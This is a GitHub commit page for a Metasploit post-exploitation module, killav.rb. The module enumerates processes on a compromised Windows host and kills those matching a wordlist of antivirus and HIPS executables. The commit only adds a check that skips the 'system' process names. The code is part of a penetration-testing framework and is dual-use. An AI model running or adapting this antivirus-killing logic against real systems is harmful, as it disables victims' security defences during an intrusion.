Skip to content

Commit 663bcbe

Browse files
wchen-r7wchen-r7
committed
Avoid checking these system process names
1 parent 64a91a5 commit 663bcbe

File tree

1 file changed

+8
-0
lines changed

1 file changed

+8
-0
lines changed

modules/post/windows/manage/killav.rb

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,13 @@ def initialize(info={})
2626
))
2727
end
2828

29+
def skip_process_name?(process_name)
30+
[
31+
'[system process]',
32+
'system'
33+
].include?(process_name)
34+
end
35+
2936
def run
3037
avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists',
3138
'av_hips_executables.txt')).strip
@@ -34,6 +41,7 @@ def run
3441
processes_found = 0
3542
processes_killed = 0
3643
client.sys.process.get_processes().each do |x|
44+
next if skip_process_name?(x['name'].downcase)
3745
vprint_status("Checking #{x['name'].downcase} ...")
3846
if avs.include?(x['name'].downcase)
3947
processes_found += 1

0 commit comments

Comments
 (0)